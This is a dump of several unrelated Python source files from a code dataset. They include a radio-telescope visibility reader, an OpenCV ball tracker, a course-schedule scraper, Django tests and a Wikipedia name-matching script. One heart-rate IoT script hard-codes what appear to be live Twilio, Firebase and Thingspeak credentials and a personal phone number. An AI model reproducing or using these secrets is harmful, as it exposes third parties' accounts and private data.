vis_header[self.VisHeader.PhaseCentre][0]['data']\n self._cross_correlation = vis_header[self.VisHeader.FlagCrossCorrelation][0]['data']\n self._auto_correlation = vis_header[self.VisHeader.FlagAutoCorrelation][0]['data']\n\n self.telescope_path = vis_header[self.VisHeader.TelescopePath][0]['data'].tostring().decode()[:-1]\n self.telescope_lon = vis_header[self.VisHeader.TelescopeLon][0]['data']\n self.telescope_lat = vis_header[self.VisHeader.TelescopeLat][0]['data']\n self.telescope_alt = vis_header[self.VisHeader.TelescopeAlt][0]['data']\n self.station_x = vis_header[self.VisHeader.StationX][0]['data']\n self.station_y = vis_header[self.VisHeader.StationY][0]['data']\n self.station_z = vis_header[self.VisHeader.StationZ][0]['data']\n\n #\n # block_dims = self.data[self.Group.VisBlock][self.VisBlock.Dims]\n # for index in block_dims:\n # print index, block_dims[index]['data']\n\n def uvw(self, flatten=False):\n # FIXME(BM) handle channels?\n # FIXME(BM) uvw coordinates when auto-correlations are present.\n group = self.Group.VisBlock\n tag_uu = self.VisBlock.UU\n tag_vv = self.VisBlock.VV\n tag_ww = self.VisBlock.WW\n uu = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n vv = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n ww = numpy.empty((self.num_times, self.num_baselines), dtype='f8')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][self.VisBlock.Dims][index]['data']\n block_times = block_dims[2]\n block_time_start = block_dims[0]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n uu_block = self.record[group][tag_uu][index]['data']\n uu_block = uu_block[0:block_baselines * block_times]\n uu_block = uu_block.reshape((block_times, block_baselines))\n uu[block_time_start:block_time_start + block_times, :] = uu_block\n vv_block = self.record[group][tag_vv][index]['data']\n vv_block = vv_block[0:block_baselines * block_times]\n vv_block = vv_block.reshape((block_times, block_baselines))\n vv[block_time_start:block_time_start + block_times, :] = vv_block\n ww_block = self.record[group][tag_ww][index]['data']\n ww_block = ww_block[0:block_baselines * block_times]\n ww_block = ww_block.reshape((block_times, block_baselines))\n ww[block_time_start:block_time_start + block_times, :] = ww_block\n # FIXME(BM): The data starts flat so if flatten, just don't reshape?\n if flatten:\n uu = uu.flatten()\n vv = vv.flatten()\n ww = ww.flatten()\n return uu, vv, ww\n\n def amplitudes(self, flatten=False):\n group = self.Group.VisBlock\n tag = self.VisBlock.CrossCorrelation\n tag_dims = self.VisBlock.Dims\n\n if self.pol_type == self.PolarisationType.I:\n amp = numpy.empty((self.num_times, self.num_baselines), dtype='c16')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][tag_dims][index]['data']\n block_time_start = block_dims[0]\n block_times = block_dims[2]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n amp_block = self.record[group][tag][index]['data']\n amp_block = amp_block[0:block_baselines * block_times]\n amp_block = amp_block.reshape((block_times, block_baselines))\n amp[block_time_start:block_time_start + block_times, :] = \\\n amp_block\n if flatten:\n amp = amp.flatten()\n return amp\n\n elif self.pol_type == self.PolarisationType.Linear:\n amp = numpy.empty((self.num_times, self.num_baselines, 2, 2),\n dtype='c16')\n for index in range(0, self.num_blocks):\n block_dims = self.record[group][tag_dims][index]['data']\n block_time_start = block_dims[0]\n block_times = block_dims[2]\n block_baselines = block_dims[4]\n assert block_baselines == self.num_baselines, \\\n \"Data dimension mismatch\"\n assert block_times <= self.block_length, \\\n \"Invalid block length ?!.\"\n amp_block = self.record[group][tag][index]['data']\n amp_block = amp_block[0:block_baselines * block_times]\n amp_block = amp_block.reshape((block_times, block_baselines,\n 2, 2))\n amp[block_time_start:block_time_start + block_times, :] = \\\n amp_block\n if flatten:\n amp = amp.reshape(self.num_baselines * self.num_times, 2, 2)\n return amp\n\n def stokes_i(self, flatten=True):\n amp = self.amplitudes(flatten)\n if len(amp.shape) > 1:\n if self.pol_type == self.PolarisationType.Linear:\n amp = 0.5 * (amp[:, 0, 0] + amp[:, 1, 1])\n else:\n raise ValueError('Unexpected polarisation type.')\n return amp\n\n def times(self, flatten=False):\n \"\"\" Returns visibility times in MDJ UTC \"\"\"\n time_interval_mjd = self._time_interval / (3600.0 * 24.0)\n times = self._start_time + time_interval_mjd * numpy.arange(self.num_times)\n if flatten:\n return numpy.repeat(times, int(self.num_baselines))\n else:\n return numpy.transpose(numpy.tile(times, (int(self.num_baselines), 1)))\n\n def stations(self, flatten=False):\n assert self._cross_correlation, \\\n \"Reading non-cross-correlation data not fully supported yet!\"\n\n # Order according to documentation is 0-1, 0-2, 0-3... 1-2, ...\n station1 = numpy.repeat(numpy.arange(self.num_stations),\n self.num_stations-1 - numpy.arange(self.num_stations))\n station2 = numpy.hstack([numpy.arange(start+1, self.num_stations)\n for start in numpy.arange(self.num_stations)])\n # Tile in one or two dimensions depending on whether we want a\n # flat result\n tiles = (int(self.num_times) if flatten else [int(self.num_times), 1])\n return numpy.tile(station1, tiles), numpy.tile(station2, tiles)\n\n def phase_centre(self, flatten=False):\n \"\"\" Returns RA and DEC of the phase centre in degrees \"\"\"\n assert self._phase_centre_type == 0, \\\n \"Unknown phase centre type %d!\" % self._phase_centre_type\n return (self._phase_centre[0], self._phase_centre[1])\n\n def frequency(self, channel=0):\n group = self.Group.VisHeader\n tag = self.VisHeader.StartFrequency\n index = 0\n start_freq = self.record[group][tag][index]['data']\n tag = self.VisHeader.FrequencyIncrement\n freq_inc = self.record[group][tag][index]['data']\n return start_freq + channel * freq_inc\n\n def print_summary(self, verbose=False):\n print('No. times : %i' % self.num_times)\n print('No. channels : %i' % self.num_channels)\n print('No. baselines : %i' % self.num_baselines)\n if verbose:\n for group_id in self.record:\n group_data = self.record[group_id]\n for tag_id in group_data:\n tag_data = group_data[tag_id]\n for index in tag_data:\n block = tag_data[index]\n print('[%03i]' % block['number'], end=' ')\n block_id = '%i.%i.%i' % (group_id, tag_id, index)\n print('%-9s' % block_id, end=' ')\n group_name = ''\n if group_id == self.Group.VisHeader:\n group_name = 'VisHeader'\n if group_id == self.Group.VisBlock:\n group_name = 'VisBlock'\n print('%-15s' % group_name, end=' ')\n if block['flag_crc']:\n print('crc', end=' ')\n print('')\n\n\ndef import_visibility_from_oskar(oskar_file: str) -> Visibility:\n \"\"\" Import a visibility set from an OSKAR visibility file\n\n :param oskar_file: Name of OSKAR visibility file\n :returns: Visibility\n \"\"\"\n \n # Extract data from Oskar file\n oskar_vis = OskarVis(oskar_file)\n ra, dec = oskar_vis.phase_centre()\n a1, a2 = oskar_vis.stations(flatten=True)\n \n # Make configuration\n location = EarthLocation(lon=oskar_vis.telescope_lon,\n lat=oskar_vis.telescope_lat,\n height=oskar_vis.telescope_alt)\n antxyz = numpy.transpose([oskar_vis.station_x,\n oskar_vis.station_y,\n oskar_vis.station_z])\n config = Configuration(\n name=oskar_vis.telescope_path,\n location=location,\n xyz=antxyz\n )\n \n # Construct visibilities\n return Visibility(\n frequency=[oskar_vis.frequency(i) for i in range(oskar_vis.num_channels)],\n phasecentre=SkyCoord(frame=ICRS, ra=ra, dec=dec, unit=u.deg),\n configuration=config,\n uvw=numpy.transpose(oskar_vis.uvw(flatten=True)),\n time=oskar_vis.times(flatten=True),\n antenna1=a1,\n antenna2=a2,\n vis=oskar_vis.amplitudes(flatten=True),\n weight=numpy.ones(a1.shape))\n","sub_path":"util/read_oskar_vis.py","file_name":"read_oskar_vis.py","file_ext":"py","file_size_in_byte":22576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"321850481","text":"\nf = open('art_ascii.txt', 'r')\n\ndots = []\nfull = ''\nn = 1\nfor l in f:\n print(l[46:-1])\n if n == 1:\n full += l[46 + 8:-1].ljust(8,' ')\n n +=1\n continue\n\n\n #dots.append(l[46:-1].ljust(16,' '))\n full += l[46:-1].ljust(16,' ')\n n+=1\n print(len(l[46:-1].ljust(16,' ')))\n\n\nprint(len(dots))\nprint(len(full))\n#print(full)\nprint(full[-300:-1])\nf.close()\n\n\n\nfor j in range(4,30):\n print('-*******************')\n print(j)\n print('-*******************')\n for i in range(int(len(full) / j)):\n print(full[i * j: (i + 1) * j])\n\n\n\n'''\nfor i in range(2, 20):\n #if len(dots) % i != 0: continue\n print('-*******************')\n print(i)\n print('-*******************')\n for j in range(int(len(dots)/ i)):\n s = ''\n for k in range(i):\n s += dots[i * j + k]\n\n print(s)\n'''\n","sub_path":"art_ascii.py","file_name":"art_ascii.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"241896380","text":"import logging\nimport cv2\nimport imutils\nimport numpy as np\nfrom collections import deque\n\ngreen_lower = (29, 86, 6)\ngreen_upper = (64, 255, 255)\n\nclass Processor(object):\n \"\"\"\n Defines a class to apply additional processing to the image\n returned by the callback\n \"\"\"\n\n def __init__(self, notify_cb = None):\n \"\"\"\n Constructor\n \"\"\"\n\n self.width = 320\n self.height = 240\n self.pts = deque(maxlen = 10)\n self.notify_cb = notify_cb\n\n def cleanup(self):\n pass\n\n def image_process_entry(self, bgr_image, width, height):\n \"\"\"\n Called each time an image can be processed\n \"\"\"\n # Blur the image\n #MED_FILTER_APRTRE_SIZE = 5 # Must be odd number\n #bgr_blur_image = cv2.medianBlur(bgr_image, MED_FILTER_APRTRE_SIZE)\n\n # Convert the image from 'BGR' to HSV colour space\n #hsv_image = cv2.cvtColor(bgr_blur_image, cv2.COLOR_BGR2HSV)\n\n blurred = cv2.GaussianBlur(bgr_image, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n mask = cv2.inRange(hsv, green_lower, green_upper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n center = None\n\n # only proceed if at least one contour was found\n if cnts:\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n if radius > 10:\n # draw the circle and centroid on the frame,\n # then update the list of tracked points\n cv2.circle(bgr_image, (int(x), int(y)), int(radius),\n (0, 255, 255), 2)\n cv2.circle(bgr_image, center, 5, (0, 0, 255), -1)\n\n self.pts.appendleft(center)\n\n print(center)\n\n if self.notify_cb is not None:\n self.notify_cb(center)\n\n # loop over the set of tracked points\n for i in range(1, len(self.pts)):\n # if either of the tracked points are None, ignore\n # them\n if self.pts[i - 1] is None or self.pts[i] is None:\n continue\n\n # otherwise, compute the thickness of the line and\n # draw the connecting lines\n thickness = int(np.sqrt(10 / float(i + 1)) * 2.5)\n cv2.line(bgr_image, self.pts[i - 1], self.pts[i], (0, 0, 255), thickness)\n\n # Capture a key press. The function waits argument in ms\n # for any keyboard event\n # For some reason image does not show without this!\n cv2.waitKey(1) & 0xFF\n","sub_path":"image/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"467813749","text":"import pyons\nimport itertools\n\n\nclass Model:\n def __init__(self):\n self.command_index = itertools.count()\n self.reply_timeout = 1.0\n self.next_ping_timeout = 4.0\n self.num_pings_generated = 0\n self.num_pongs_generated = 0\n\n\nclass Message(object):\n def __init__(self, name, index):\n self.name = name\n self.index = index\n\n def __str__(self):\n return \"{}-{}\".format(self.name, self.index)\n\n\n@pyons.static_initializer(stage='1-base')\ndef initialize(model):\n pyons.info(\"PingPong is initializing\", sender=\"initialize\")\n cmd = Message('PING', next(model.command_index))\n model.num_pings_generated += 1\n pyons.schedule(cmd, 0)\n\n\n@pyons.static_handler(lambda event: event.name[:4].lower() == 'ping')\ndef ping_handler(event, model):\n reply = Message('PONG', event.index)\n model.num_pongs_generated += 1\n pyons.schedule(reply, model.reply_timeout)\n pyons.info(\"received {}, sending {} in {} sec.\".format(event, reply, model.reply_timeout), sender=\"ping_handler\")\n\n\n@pyons.static_handler(lambda event: event.name[:4].lower() == 'pong')\ndef pong_handler(event, model):\n cmd = Message('PING', next(model.command_index))\n model.num_pings_generated += 1\n pyons.schedule(cmd, model.next_ping_timeout)\n pyons.info(\"received {}, sending {} in {} sec.\".format(event, cmd, model.next_ping_timeout), sender=\"pong_handler\")\n\n\n@pyons.static_finalizer()\ndef finalize(model):\n pyons.info(\"PingPong is finished:\", sender=\"finalize\")\n print(\"\\t+ pings generated: {}\".format(model.num_pings_generated))\n print(\"\\t+ pongs generated: {}\".format(model.num_pongs_generated))\n print(\"\\t+ events generated: {}\".format(pyons.Kernel().num_events_handled))\n\n events = ['{}@t={}'.format(envelope.event, envelope.fire_time) for envelope in pyons.Kernel().events]\n print(\"\\t+ resting events: {}\".format(events))\n\n\n@pyons.static_stop_condition(guard=lambda kernel: kernel.num_events_handled % 2 == 0)\ndef check_generated_enough(model):\n return model.num_pongs_generated >= 3\n\n\nif __name__ == '__main__':\n m = Model()\n pyons.setup_env(log_level=pyons.LogLevel.DEBUG, sender_field_width=12, time_precision=2)\n pyons.run(model=m, max_events=100)\n","sub_path":"examples/pingpong_1.py","file_name":"pingpong_1.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"51495919","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 22:10:33 2021\n\n@author: Philippe\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport string\nimport csv as csv\nimport pandas as pd\n\nbase = 'https://crs.upd.edu.ph/schedule/'\nyear = '120202/'\nletter = 'A'\n\n\n\ndef save_html(url, path):\n r = requests.get(url)\n with open(path, 'wb') as f:\n f.write(r.content)\n \n \ndef open_html(path):\n with open(path, 'rb') as f:\n return f.read()\n \ndef access_html(letter):\n print('checking letter : ' + letter)\n url = base + year + letter\n r = requests.get(url)\n html = r.content\n \n soup = BeautifulSoup(html, 'html.parser')\n rows = soup.select('tbody tr')\n data = []\n \n if(len(rows) == 1):\n return data\n \n for row in rows:\n d = dict()\n d['course number'] = row.findAll('td')[0].text.strip()\n print(d['course number'])\n if (not (d['course number'].isnumeric())):\n continue\n d['name'] = row.findAll('td')[1].text.strip()\n d['units'] = row.findAll('td')[2].text.strip()\n d['schedule'] = row.findAll('td')[3].text.strip().split('\\n')[0].rsplit(\" \", 2)[0]\n print(d['schedule'])\n \n if (len(row.findAll('td')[3].text.strip().split('\\n')) == 1 ):\n d['professor'] = d['schedule']\n d['schedule'] = \"TBA\"\n continue\n \n d['professor'] = row.findAll('td')[3].text.strip().split('\\n')[1].strip('\\t')\n \n data.append(d)\n print(data[0])\n return data\n\ndef create_csv():\n mycsv = []\n for letter in list(string.ascii_uppercase):\n result = access_html(letter)\n if result:\n mycsv = mycsv + result\n \n \n \n keys = mycsv[0].keys()\n \n with open('crs.csv', 'a', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file,keys)\n dict_writer.writeheader()\n dict_writer.writerows(mycsv)\n\ndef load_csv():\n data = pd.read_csv('crs.csv', encoding = \"ISO-8859-1\", engine='python')\n data.head()\n return data\n\ndef filter_subject(mycsv, search_name):\n return mycsv[mycsv[\"name\"].str.contains(search_name, na=False, case=False)]\n\nclass Course:\n def __init__(self, id, courseName, teacher, meetingTime):\n self._id = id\n self._courseName = courseName\n self._teacher = teacher\n self._meetingTime = meetingTime\n \nclass Subject:\n def __init__(self, name):\n self._name = name\n self._courses = []\n def get_courses(self):\n return self._courses\n \n \n \n \nsubjectList = []\n\nsample_input = [\"Fil 40\", \"MS 1\" , \"CW 10\", \"CoE 115\"]\nlength = len(sample_input)\nmycsv = load_csv()\n\npossible_subjects = []\nfor input in sample_input:\n newSubject = Subject(input)\n #possible_subjects.append(filter_subject(mycsv, input))\n for index, row in filter_subject(mycsv, input).iterrows():\n newSubject._courses.append(Course(row['course number'], row['name'], row['professor'], row['schedule']))\n #print(\"Name: \" + str(row['name']))\n subjectList.append(newSubject)\n #mylist = [(Course(id, row.name, row.professor, row.schedule)) for index, row in filter_subject(mycsv, input).items()]\n \n\nfor subject in subjectList:\n print(\"\\n\\n\\t\\t\\t\\tSubject Name: \" + str(subject._name))\n for courses in subject._courses:\n print(\"Course Name: \" + courses._courseName)\n print(\"Meeting Times: \" + courses._meetingTime)\n print(\"Professor: \" + courses._teacher)\n\n\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"427788139","text":"import unittest\nfrom unittest.mock import patch, Mock\n\nfrom django.test import TestCase\n\nfrom todo.forms import (\n DUPLICATE_ITEM_ERROR, EMPTY_ITEM_ERROR,\n ExistingListItemForm, ItemForm, NewListForm\n)\nfrom todo.models import Item, List\n\n\nNEW_ITEM_TEXT = 'new item text'\n\n\nclass ItemFormTest(TestCase):\n\n def test_form_item_input_has_placeholder_and_css_classes(self):\n form = ItemForm()\n self.assertIn('placeholder=\"Enter a to-do item\"', form.as_p())\n self.assertIn('class=\"form-control input-lg\"', form.as_p())\n\n def test_form_validation_for_blank_items(self):\n form = ItemForm(data={'text': ''})\n self.assertFalse(form.is_valid())\n self.assertEqual(form.errors['text'], [EMPTY_ITEM_ERROR])\n\n\nclass NewListFormTest(unittest.TestCase):\n\n @patch('todo.forms.List.createNew')\n def test_save_with_not_authenticated_user_creates_new_list_form_post_data(\n self, mock_List_create_new\n ):\n user = Mock(is_authenticated=lambda: False)\n form = NewListForm(data={'text': NEW_ITEM_TEXT})\n form.is_valid()\n form.save(owner=user)\n mock_List_create_new.assert_called_once_with(\n first_item_text=NEW_ITEM_TEXT\n )\n\n @patch('todo.forms.List.createNew')\n def test_save_with_authenticated_user_creates_new_list_with_owner(\n self, mock_List_create_new\n ):\n user = Mock(is_authenticated=lambda: True)\n form = NewListForm(data={'text': NEW_ITEM_TEXT})\n form.is_valid()\n form.save(owner=user)\n mock_List_create_new.assert_called_once_with(\n first_item_text=NEW_ITEM_TEXT, owner=user\n )\n\n @patch('todo.forms.List.createNew')\n def test_save_returns_new_list_object(self, mock_List_create_new):\n user = Mock(is_authenticated=lambda: True)\n form = NewListForm(data={'text': NEW_ITEM_TEXT})\n form.is_valid()\n res = form.save(owner=user)\n self.assertEqual(res, mock_List_create_new.return_value)\n\n\nclass ExistingListItemFormTest(TestCase):\n\n def test_form_renders_item_text_input(self):\n todo_list = List.objects.create()\n form = ExistingListItemForm(for_list=todo_list)\n self.assertIn('placeholder=\"Enter a to-do item\"', form.as_p())\n\n def test_form_validation_for_blank_items(self):\n todo_list = List.objects.create()\n form = ExistingListItemForm(for_list=todo_list, data={'text': ''})\n self.assertFalse(form.is_valid())\n self.assertEqual(form.errors['text'], [EMPTY_ITEM_ERROR])\n\n def test_form_validation_for_duplicate_items(self):\n todo_list = List.objects.create()\n Item.objects.create(todo_list=todo_list, text='no duplicates')\n form = ExistingListItemForm(for_list=todo_list, data={'text': 'no duplicates'})\n self.assertFalse(form.is_valid())\n self.assertEqual(form.errors['text'], [DUPLICATE_ITEM_ERROR])\n\n def test_form_save(self):\n todo_list = List.objects.create()\n form = ExistingListItemForm(for_list=todo_list, data={'text': 'hi'})\n new_item = form.save()\n self.assertEqual(new_item, Item.objects.all()[0])\n","sub_path":"todo/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"547012999","text":"'''给定一个字符串,找出不含有重复字符的最长子串的长度。\n\n示例:\n\n给定 \"abcabcbb\" ,没有重复字符的最长子串是 \"abc\" ,那么长度就是3。\n\n给定 \"bbbbb\" ,最长的子串就是 \"b\" ,长度是1。\n\n给定 \"pwwkew\" ,最长子串是 \"wke\" ,长度是3。请注意答案必须是一个子串,\"pwke\" 是 子序列 而不是子串。\n\n'''\n\n\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s)<2:\n return len(s)\n dic={}\n start=0\n max_length=0\n for i in range(len(s)):\n if s[i] in dic and dic[s[i]]>start:\n start=dic[s[i]]+1\n\n max_length=max(i-dic[s[i]],max_length)\n return max_length\n\n","sub_path":"nuSolved/3. 无重复字符的最长子串.py","file_name":"3. 无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"93907166","text":"import serial\r\nimport time\r\nimport thingspeak\r\nimport pyrebase\r\nfrom twilio.rest import Client\r\n#import firebase\r\nchannel_id = 1211863\r\nread_key ='K1FJFQPPHZ8QWZEO'\r\nser = serial.Serial('COM6',115200)\r\nchannel = thingspeak.Channel(id=channel_id, api_key=read_key)\r\nconfig = {\r\n \"apiKey\": \"AIzaSyCse3HpG_aSAMoCZ468TVDsWfgTqGCjlAs\",\r\n \"authDomain\": \"rt-heart-pluse-analysis.firebaseapp.com\",\r\n \"databaseURL\": \"https://rt-heart-pluse-analysis-default-rtdb.firebaseio.com/\",\r\n \"storageBucket\": \"rt-heart-pluse-analysis.appspot.com\"\r\n}\r\nfirebase = pyrebase.initialize_app(config)\r\ndb = firebase.database()\r\naccount_sid = 'ACddd892bad27fe97f17d7140b5adbbcad' \r\nauth_token = '3ef7ab34695b233f16410db06f56b607'\r\nclient = Client(account_sid, auth_token) \r\nwhile 1:\r\n data= ser.readline().rstrip()\r\n print(\" heart rate :\"+ str(data))\r\n response = channel.update({'field1':data})\r\n data1={\"heart_rate\":str(data)}\r\n db.child(\"real time data\").child(\"1-set\").set(data1)\r\n message = client.messages.create( \r\n from_='whatsapp:+14155238886', \r\n body=(\"heart_pluse of patient :\"+str(data)), \r\n to='whatsapp:+917619398922' \r\n ) \r\n print(message.sid)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"146598141","text":"import hashlib\r\nfrom datetime import timedelta\r\nfrom typing import Optional\r\n\r\nfrom pyramid.request import Request\r\nfrom pyramid.response import Response\r\n\r\nfrom rxit_utils.infrastructure.number_utils import try_int\r\n\r\nauth_cookie_name = \"e45k0gifdtebz07r8f30smjdb9rf4d\"\r\n\r\ndef set_auth(request: Request, user_id: int):\r\n hash_val = __hash_text(str(user_id))\r\n val = \"{}:{}\".format(user_id, hash_val)\r\n\r\n request.add_response_callback(\r\n lambda req, resp: __add_cookie_callback(req, resp, auth_cookie_name, val)\r\n )\r\n\r\n\r\ndef __hash_text(text: str) -> str:\r\n text = \"salty__\" + text + \"__text\"\r\n return hashlib.sha512(text.encode(\"utf-8\")).hexdigest()\r\n\r\n\r\ndef __add_cookie_callback(_, response: Response, name: str, value: str):\r\n response.set_cookie(name, value, max_age=timedelta(days=7))\r\n\r\n\r\ndef get_user_id_via_auth_cookie(request: Request) -> Optional[int]:\r\n if auth_cookie_name not in request.cookies:\r\n return None\r\n\r\n val = request.cookies[auth_cookie_name]\r\n parts = val.split(\":\")\r\n if len(parts) != 2:\r\n return None\r\n\r\n user_id = parts[0]\r\n hash_val = parts[1]\r\n hash_val_check = __hash_text(user_id)\r\n if hash_val != hash_val_check:\r\n print(\"Warning: Hash mismatch, invalid cookie value\")\r\n return None\r\n\r\n return try_int(user_id)\r\n\r\n\r\ndef logout(request: Request):\r\n request.add_response_callback(\r\n lambda req, resp: __delete_cookie_callback(resp, auth_cookie_name)\r\n )\r\n\r\n\r\ndef __delete_cookie_callback(response: Response, name: str):\r\n response.delete_cookie(name)\r\n","sub_path":"rxit_utils/infrastructure/cookie_auth.py","file_name":"cookie_auth.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"534763792","text":"from __future__ import division\n\n#pywikibot\nimport pywikibot\nfrom pywikibot import pagegenerators\nfrom pywikibot.pagegenerators import GeneratorFactory, parameterHelp\n\n#distance between strings\nfrom difflib import SequenceMatcher\n\n#strings:\nimport string\n\n#combibations of sets\nimport itertools\n\n#json\nimport json\n\n\nimport unicodedata\nimport datetime\n\n\n\n\n###\n#stackoverflow:begin\nimport re\nimport unicodedata\n\ndef StripAccents(text):\n \"\"\"\n Strip accents from input String.\n :param text: The input string.\n :type text: String.\n :returns: The processed String.\n :rtype: String.\n \"\"\"\n try:\n text = unicode(text, 'utf-8')\n except NameError: # unicode is a default on python 3 \n pass\n text = unicodedata.normalize('NFD', text)\n text = text.encode('ascii', 'ignore')\n text = text.decode(\"utf-8\")\n return str(text)\n#Stackoverflow:end\n\n\ndef CompareFullNames(FullName, Name):\n\tNameList1 = StripAccents(FullName).split()\n\tNameList2 = StripAccents(Name).split()\n\n\tif '(' in NameList1[-1]:\n\t\tNameList1.pop()\n\n\tif '(' in NameList2[-1]:\n\t\tNameList2.pop()\n\n\tif len(NameList2) > len (NameList1): \n\t\treturn 0\n\n\tlenght = min(len(NameList1), len(NameList2))\n\n\tMaxScore = 0\n\tfor l in [lenght]:\n\t\tfor Combination1 in itertools.combinations(NameList1, l): \n\t\t\tfor Combination2 in itertools.combinations(NameList2, l): \n\t\t\t\tScore = 0\n\t\t\t\tMatchedWords = 0\n\t\t\t\tfor k in range(0, l):\t\t\t\n\t\t\t\t\tWordScore = SequenceMatcher(None,Combination1[k],Combination2[k]).ratio()\n\t\t\t\t\tif WordScore > .7: #A arbitrary number\n\t\t\t\t\t\tScore = Score + WordScore\n\t\t\t\t\t\tMatchedWords = MatchedWords + 1\n\t\t\t\tif MatchedWords==l:\n\t\t\t\t\tMaxScore = max (MaxScore, Score)\n\t\t\t\t\n\t\n\n\treturn MaxScore\n\n\ndef CompareNames(Name1, Name2):\n\tNameList1 = StripAccents(Name1).split()\n\tNameList2 = StripAccents(Name2).split()\n\n\tif '(' in NameList1[-1]:\n\t\tNameList1.pop()\n\n\tif '(' in NameList2[-1]:\n\t\tNameList2.pop()\n\n\tlenght = min(len(NameList1), len(NameList2))\n\n\tMaxScore = 0\n\tfor l in range(2, lenght+1):\n\t\tfor Combination1 in itertools.combinations(NameList1, l): \n\t\t\tfor Combination2 in itertools.combinations(NameList2, l): \n\t\t\t\tScore = 0\n\t\t\t\tMatchedWords = 0\n\t\t\t\tfor k in range(0, l):\t\t\t\n\t\t\t\t\tWordScore = SequenceMatcher(None,Combination1[k],Combination2[k]).ratio()\n\t\t\t\t\tif WordScore > .5: #A arbitrary number\n\t\t\t\t\t\tScore = Score + WordScore\n\t\t\t\t\t\tMatchedWords = MatchedWords + 1\n\t\t\t\tScore = Score - (lenght - MatchedWords) * 0.7 #A arbitrary penalization factor \n\t\t\t\tMaxScore = max (MaxScore, Score)\n\t\t\t\t\n\t\n\treturn MaxScore - abs (len(NameList1) - len(NameList2) ) * 0.2 #A arbitrary penalization factor\n\n\n\n#Look for articles about someone, treat search suggestions (no ideia how to retrieve them)\ndef HasArticle(FullName):\n\ttotal=10 #number of pages we are retrieving from Wikipedia\n\t#print (FullName)\n\tgen = pagegenerators.SearchPageGenerator(query=FullName, site=site, namespaces=[0], total=total)\n\tArticleList = []\n\n\t#Redirects = pagegenerators.RedirectFilterPageGenerator(gen, no_redirects=False)\n\n\t#Get list of titles and sring distance from FullName \t\n\tfor Article in gen:\n\t\tArticleTitle = Article.title()\n\t\tScore = CompareFullNames(FullName, ArticleTitle)\n\t\tArticleList.append ((Article, ArticleTitle, Score))\n\t\t#print(ArticleTitle)\n\n\tSortedArticleList = sorted (ArticleList, key = lambda ArticleList:-ArticleList[2])\n\t#print(SortedArticleList)ret\n\n\t#print(ArticleList)\n\tif SortedArticleList == []:\n\t\treturn False\n\n\tBestScore = SortedArticleList [0][2]\n\t#print (BestScore)\n\n\t#Magic number\n\tif BestScore < 1.5:\n\t\treturn False\n\treturn SortedArticleList [0][1]\n\n\n\n\n\n\n\n###\n\n\nmeses = {'jan':1, 'fev':2, 'mar':3, 'abr':4, 'mai':5, 'jun':6, 'jul':7, 'ago':8, 'set':9, 'out':10, 'nov':11, 'dez':12}\ndef parse(gender):\n\tfor number, name, link, birth, field, obs in Table:\n#\t\tprint (birth)\t\n\t\tpos = birth.find(' ')\n\t\tbirth = birth[pos+1:]\n\t\tpos = birth.find(' ')\n\t\tdia = int(birth[:pos].replace('º',''))\n\t\tif dia>0:\t\n\t\t\tpos = birth.find('de')\n\t\t\tmes = meses.get(birth[pos+3:pos+6].lower())\n\t\t\tano = int(birth[pos+10:pos+14])\n\t\t\t#birth = datetime.datetime(ano, mes, dia)\n\t\t\tbirth = [ano, mes, dia] \n\t\telse:\n\t\t\tmes = 0\n\t\t\tano = 0\n\t\t\tbirth = None\n\n\t\tArticle = name #HasArticle (name) ############## \n\t\tif Article == False:\n\t\t\tprint (name, \" XXXX\")\n\t\t\tArticleName = 'X'\n\t\telse:\n\t\t\tprint (name, \"s\",Article.title())\n#\t\t\tNumberOfExistingArticles = NumberOfExistingArticles + 